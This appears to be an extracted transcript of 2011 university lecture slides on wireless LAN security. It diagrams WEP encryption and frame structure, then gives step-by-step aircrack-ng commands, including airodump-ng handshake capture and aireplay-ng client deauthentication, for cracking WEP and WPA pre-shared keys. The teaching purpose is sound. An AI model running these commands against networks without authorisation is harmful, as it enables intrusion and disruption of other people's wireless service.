wlan security: cracking wep/wpa - kasetsart universityanan/myhomepage/wp-content/... · 1 wlan...
TRANSCRIPT
1
WLAN Security: Cracking WEP/WPA
รศ. ดร. อนันต์ ผลเพิ่ม
Assoc. Prof. Anan Phonphoem, Ph.D. [email protected]
http://www.cpe.ku.ac.th/~anan
Computer Engineering Department
Kasetsart University, Bangkok, Thailand
Wireless LANs 2011
WEP Block Diagram
2
WEP Frame
Integrity Algorithm (CRC-32)
Pseudo-Random Number Generator
RC-4
+
Bitwise XOR
Plain Text
Cipher Text
Integrity Check Value (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
Initialization Vector (IV)
IV
Encryption Block
Sender Site
Integrity Algorithm
Pseudo-Random Number Generator
Bitwise XOR
Cipher Text
Plain Text
Integrity Check Value (ICV)
Key Sequence
IV
Secret Key (40-bit or 128-bit)
Decryption Block
Receiver Site
3
WEP – Encoding
Integrity Algorithm (CRC-32)
Pseudo-Random Number Generator
RC-4
+
Bitwise XOR
Plain Text
Cipher Text
Integrity Check Value (ICV)
Key Sequence
Secret Key (40-bit or 128-bit)
Initialization Vector (IV)
IV
4
WEP Frame
Frame Header
IV Header
Frame Body ICV
Trailer FCS
Encrypted Clear Text Clear Text
4 bytes 4 bytes
5
WEP – Decryption
Integrity Algorithm
Pseudo-Random Number Generator
Bitwise XOR
Cipher Text
Plain Text
Integrity Check Value (ICV)
Key Sequence
IV
Secret Key (40-bit or 128-bit)
7
Cracking Steps
1) Reconnaissance (Collect target info.) [kismet]
2) Run promiscuous mode [iwconfig, airmon]
3) Collect data [airodump]
4) Crack key [aircrack]
Airodump problem
root@APMoose:~/toulouse# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
/dev/rfkill is “Linux ‘s Subsystem kernel for controlling radio transmisster (activated/deactivated)”
anan@APMoose:~$ rfkill list
0: phy0: Wireless LAN
Soft blocked: no software can reactivate
Hard blocked: no software cannot reactivate
1: acer-wireless: Wireless LAN
Soft blocked: no
Hard blocked: no
2: acer-bluetooth: Bluetooth
Soft blocked: no
Hard blocked: no
4: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
Solve by:
root@APMoose:~/toulouse# rfkill unblock all
20
Cracking Steps
1)Start the wireless interface in monitor mode on the specific AP channel
2)Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
3)Use aireplay-ng to deauthenticate the wireless client
4)Run aircrack-ng to crack the pre-shared key using the authentication handshake
27 http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Start airodump-ng
33
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0
Parameter Description
-c 6 Wireless channel
--bssid 00:1E:F7:xx:xx:xx AP’s MAC
-w psk File name prefix (contain Ivs)
mon0 Interface name
aireplay
36
Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0
Parameter Description
-0 deauthentication
1 # deauthentication sent
-a 00:12:01:xx:xx:xx AP’s MAC
-c 00:23:11:xx:xx:xx Deauthing client’s MAC-
mon0 Interface name